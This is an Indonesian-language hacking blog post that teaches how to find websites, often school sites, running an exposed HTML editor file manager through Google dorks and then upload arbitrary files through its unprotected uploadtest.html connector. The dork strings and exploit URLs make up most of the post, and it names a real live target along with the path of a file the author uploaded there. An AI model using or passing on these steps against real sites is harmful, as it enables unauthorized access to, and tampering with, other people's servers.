» » HTML editor Vulnerability

HTML editor Vulnerability

20:07





Masih mengenai exploit nih :3 haha dan tentunya masih teknik sederhana gan :3
HTML editor yap :3 kayaknya udah pernah tau nih atau udah pernah denger . .
kalo di indonesia yang pake ginian biasanya situs2 sekolah ,, tapi diluar gak cuma situs sekolah yang pake ginian ko :3 haha . .
Baiklah langsung saja cekibroott >>
Pertama ya seperti biasa kita ngandelin Dork google ,, jadi buka google terlebih dahulu.
#Dork :
        inurl:/HTMLEditor/editor/
or "inurl:/HTMLEditor/editor//filemanager/"
or "inurl:/HTMLEditor/editor//filemanager//connectors/"
nah nanti keluar tuh banyak web ,, tinggal pilih salah satunya,,
Exploitnya kayak gini gan :
Exploit : http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Biasanya suport : txt dan jpg
Untuk menguploadnya coba agan perhatikan gambar dibawah ini :

Langsung pilih filenya gan , terus klik Send to the server ,, entar lokasi filnya diberitahu ko.
Nih contoh punya saya :

Live Target  :  http://www.townmarshfield.com/CMS/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Contoh Hasil : http://www.townmarshfield.com//CMS///files/hosting.txt

Nah begitulah gan mengenai HTML editor vulnerability ,,
Semoga bermanfaat ^_^

Catatan : Jangan sepelekan ilmu ,, karena sekecil apapun itu gunakanlah untuk hal besar ^_^

Terimakasih telah berkunjung diblog kami ,, tolong tinggalkan komentar untuk menghargai jerit payah penulis ^_^

BAGIKAN:

Subscribe To Get Best Articles!

Jika menurut kalian artikel di blog ini berkualitas dan bermanfaat, silahkan berlangganan artikel terbaru melalui pesan masuk email anda secara gratis.

No comments:

Post a Comment

" Terimakasih telah mengunjungi blog kami ,, silahkan tinggalkan komentar untuk menghargai jerit payah penulis ^_^ "

Subscribe to: Post Comments ( Atom)